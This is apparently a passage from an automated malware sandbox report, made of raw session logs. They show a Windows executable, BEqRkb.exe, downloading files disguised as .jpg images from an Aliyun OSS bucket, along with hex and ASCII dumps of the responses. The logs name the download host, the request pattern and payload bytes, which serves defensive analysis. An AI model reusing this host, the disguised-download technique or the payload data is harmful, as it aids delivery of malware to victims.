                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                                                      Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                                                      Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.450014118.178.60.94435776C:\Users\user\Documents\BEqRkb.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:54:33 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:54:33 UTC547INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:33 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 5062442
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E496E537B3837EA469F
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "70C21DA900796B279A09040B00953E40"
                                                                                      Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 360383310743409046
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                                                      x-oss-server-time: 27
                                                                                      2025-01-09 00:54:33 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                      Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                                      Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                                      Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3
                                                                                      Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d
                                                                                      Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c
                                                                                      Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71
                                                                                      Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59
                                                                                      Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3
                                                                                      Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
                                                                                      2025-01-09 00:54:33 UTC4096INData Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3
                                                                                      Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.450015118.178.60.94435776C:\Users\user\Documents\BEqRkb.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:54:45 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:54:45 UTC546INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:45 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 366410
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E556A91E53531D8D9A0
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                                                      Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 5641369857548672686
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                                                      x-oss-server-time: 7
                                                                                      2025-01-09 00:54:45 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                      Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60
                                                                                      Data Ascii: ```````````````````````````````````````````````````````````````
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5
                                                                                      Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f
                                                                                      Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5
                                                                                      Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20
